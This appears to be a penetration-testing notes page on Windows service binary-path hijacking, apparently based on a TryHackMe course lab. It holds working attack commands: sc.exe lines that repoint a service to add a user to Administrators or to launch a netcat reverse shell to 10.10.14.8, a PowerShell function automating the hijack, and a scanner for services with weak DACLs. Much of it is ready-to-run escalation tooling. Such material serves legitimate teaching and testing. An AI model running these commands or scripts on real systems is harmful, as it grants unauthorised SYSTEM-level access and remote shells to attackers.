# Binary Paths

## Overview

Every Windows service has a **binary path** (`BINARY_PATH_NAME`, the executable the Service Control Manager launches when the service starts). If the service's DACL grants our user `SERVICE_CHANGE_CONFIG` (directly, or through a write/full-control right that includes it), we can point that path at a command of our choosing; when the service is next started, the SCM runs that command under the service's account, typically `LocalSystem`. We also need `SERVICE_START` on the service to trigger it ourselves; otherwise the payload only fires when something else starts the service, for example at reboot. Because the payload is not a real service binary, the start request reports a timeout error after the command has already run, and the original path should be restored afterwards so the service is not left broken.

## Exploitation using PowerUp

#### Run PowerUp on the target machine

```powershell
# Dot-source the script so its functions are loaded into the current session, then run every check.
# Services whose configuration we can modify (here daclsvc) are listed in the Invoke-AllChecks output.
. .\PowerUp.ps1
Invoke-AllChecks
```

<figure><img src="https://152155081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUczSr73L34emqNMDOxDg%2Fuploads%2FwSm9Q3OzX6uj1WW0O9YI%2Fimage.png?alt=media&#x26;token=34ca1edf-c940-4ca0-94fb-d29ef3199963" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

#### Change the binary path

```powershell
# Call sc.exe explicitly: in PowerShell the bare word "sc" is an alias for Set-Content.
# The space after "binpath=" is required by sc.exe. Pick one payload:
# (a) add our user to the local Administrators group
sc.exe config daclsvc binpath= "net localgroup administrators Greg /add"
# (b) or spawn a reverse shell back to our listener
sc.exe config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"
```

#### Start the service

```powershell
# The SCM executes the new binpath as the service account (usually LocalSystem).
# Expect "StartService FAILED 1053" because our payload never reports itself as a running
# service; the command has already executed by the time that error is printed.
sc.exe start daclsvc
```
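The three steps above (query, repoint, start) as one script, written for this page as an added example rather than code from the original page or from the TCM course. It records the original `BINARY_PATH_NAME` before touching the service and restores it afterwards, which the bare `sc` commands do not. It assumes the page's service name `daclsvc` and user `Greg`, that the current user holds `SERVICE_QUERY_CONFIG`, `SERVICE_CHANGE_CONFIG` and `SERVICE_START` on the service, and that `sc.exe` is on the PATH.

```powershell
# Added example (not from the original page or the TCM course): binpath hijack with cleanup.
# Assumptions: service 'daclsvc' and user 'Greg' as on the page; we hold SERVICE_QUERY_CONFIG,
# SERVICE_CHANGE_CONFIG and SERVICE_START on the service; sc.exe is on PATH.
function Invoke-BinPathHijack {
    param(
        [Parameter(Mandatory)][string]$ServiceName,
        [Parameter(Mandatory)][string]$Payload
    )

    # Always call sc.exe: in PowerShell the bare word "sc" is an alias for Set-Content.
    $qc = sc.exe qc $ServiceName
    if ($LASTEXITCODE -ne 0) { throw "sc qc $ServiceName failed (exit $LASTEXITCODE)" }

    # Save the original binary path so the service can be repaired afterwards.
    $origPath = $null
    foreach ($line in $qc) {
        if ($line -match 'BINARY_PATH_NAME\s*:\s*(.+)$') { $origPath = $Matches[1].Trim() }
    }
    if (-not $origPath) { throw "Could not parse BINARY_PATH_NAME for $ServiceName" }
    Write-Host "[*] Original binpath: $origPath"

    # Repoint the service at our command. The space after "binpath=" is required by sc.exe;
    # PowerShell quotes $Payload for us because it contains spaces.
    sc.exe config $ServiceName binpath= $Payload
    if ($LASTEXITCODE -ne 0) { throw "sc config failed (exit $LASTEXITCODE): missing SERVICE_CHANGE_CONFIG?" }

    # Start it. The SCM runs the payload as the service account (usually LocalSystem). Because the
    # payload never reports itself as a running service, sc.exe prints StartService FAILED 1053
    # (timeout) and exits non-zero; the command has already executed by then, so do not abort.
    sc.exe start $ServiceName | Out-Null
    Write-Host "[*] sc start exit code: $LASTEXITCODE (1053 is expected for a non-service payload)"

    # Cleanup: restore the original path. Start-Process with a single argument string passes the
    # command line verbatim, which keeps the quotes that sc qc shows around paths with spaces
    # intact (passing $origPath straight to sc.exe can mangle embedded quotes on Windows PowerShell 5.1).
    $p = Start-Process -FilePath 'sc.exe' -ArgumentList "config $ServiceName binpath= $origPath" `
                       -Wait -NoNewWindow -PassThru
    if ($p.ExitCode -eq 0) { Write-Host "[*] Restored binpath to: $origPath" }
    else { Write-Warning "Restore failed (exit $($p.ExitCode)); fix binpath by hand: $origPath" }
}

# Usage with the page's first payload, then confirm the result.
Invoke-BinPathHijack -ServiceName 'daclsvc' -Payload 'net localgroup administrators Greg /add'
if ((net localgroup administrators) -match '^\s*Greg\s*$') { Write-Host "[+] Greg is now a local administrator" }
```

The restore step matters on an engagement: a service left pointing at `net.exe` fails every subsequent start, which is both noisy in the event log and a denial of service for whatever the service provided.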

## Exploitation via Accesschk64

#### Check for services with write permissions

```powershell
# -u suppress errors, -w show only objects with write access, -c treat the names as services,
# -v verbose. "Everyone" is checked here; repeat for "Users", "Authenticated Users" and your own
# account, since a service writable by any of those is equally usable. The flag is -accepteula.
accesschk64.exe -accepteula -uwcv Everyone *
```

<figure><img src="https://152155081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUczSr73L34emqNMDOxDg%2Fuploads%2FvrPnX00jbXYWmFy1IzB3%2Fimage.png?alt=media&#x26;token=23e6c32a-7150-48e3-8d10-9cb0f3b9580e" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

```powershell
# Dump the full permission set on the candidate service; look for SERVICE_CHANGE_CONFIG,
# SERVICE_ALL_ACCESS or WRITE_DAC granted to a group we belong to.
accesschk64.exe -accepteula -uwcv daclsvc
```

<figure><img src="https://152155081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUczSr73L34emqNMDOxDg%2Fuploads%2FbnuII3ZwPHzTrwFid96S%2Fimage.png?alt=media&#x26;token=7d9af93e-beed-4f98-9fc9-cdd85b94854f" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>
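When `accesschk64.exe` cannot be dropped on the box, the same check can be done with built-in tools: `sc.exe sdshow` prints each service's security descriptor as SDDL, and the ACEs can be scanned for rights that let a low-privileged trustee change the configuration. The following is an added example written for this page, not code from the original page or from the TCM course. It assumes the trustee shortlist below (Everyone, Authenticated Users, Builtin Users, Interactive) is what you care about; add your own user or group SIDs to `$WeakTrustees` if you want hits specific to your account.

```powershell
# Added example (not from the original page or the TCM course): find services whose DACL lets a
# low-privileged trustee rewrite the configuration, using only sc.exe and PowerShell built-ins.
# SDDL right tokens: DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER,
# GA/GW = generic all/write. Trustee shortcuts: WD = Everyone, AU = Authenticated Users,
# BU = Builtin\Users, IU = Interactive. Assumption: extend $WeakTrustees with your own SIDs as needed.
$WeakTrustees = @('WD', 'AU', 'BU', 'IU')
$WriteRights  = @('DC', 'WD', 'WO', 'GA', 'GW')

function Get-ModifiableService {
    foreach ($svc in Get-Service) {
        # sc sdshow fails with access denied on some services; skip those.
        $sddl = (sc.exe sdshow $svc.Name) -join ''
        if ($LASTEXITCODE -ne 0 -or -not $sddl) { continue }

        # Each ACE looks like (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA): type;flags;rights;;;trustee
        foreach ($ace in [regex]::Matches($sddl, '\(([^)]*)\)')) {
            $parts = $ace.Groups[1].Value -split ';'
            if ($parts.Count -lt 6 -or $parts[0] -ne 'A') { continue }   # only Allow ACEs
            $rights  = $parts[2]
            $trustee = $parts[5]
            if ($WeakTrustees -notcontains $trustee) { continue }

            # Rights are packed as two-letter tokens; split them and keep any write-class right.
            $tokens = [regex]::Matches($rights, '..') | ForEach-Object { $_.Value }
            $hit = $tokens | Where-Object { $WriteRights -contains $_ }
            if ($hit) {
                [pscustomobject]@{
                    Service = $svc.Name
                    Trustee = $trustee
                    Rights  = ($hit -join ',')
                    BinPath = (Get-CimInstance Win32_Service -Filter "Name='$($svc.Name)'").PathName
                    RunsAs  = (Get-CimInstance Win32_Service -Filter "Name='$($svc.Name)'").StartName
                }
            }
        }
    }
}

# Usage: list candidate services with the rights that make them abusable.
Get-ModifiableService | Format-Table -AutoSize
```

A `DC` hit on a service running as `LocalSystem` is the exact condition the rest of this page exploits; `WD` or `WO` are just as good, since they let you grant yourself `DC` first.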

#### Query the service

```powershell
# Show the current configuration, including BINARY_PATH_NAME (note it down so it can be
# restored afterwards) and SERVICE_START_NAME (the account the payload will run as).
sc.exe qc daclsvc
```

<figure><img src="https://152155081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUczSr73L34emqNMDOxDg%2Fuploads%2FP8o5xcEp7tPKE2SYNLcD%2Fimage.png?alt=media&#x26;token=d4b5fd3a-bbbd-43b9-902b-511abe676f59" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

#### Change the binary path and start the service

Same commands as in the PowerUp method above: `sc.exe config daclsvc binpath= ...` with the chosen payload, followed by `sc.exe start daclsvc`.
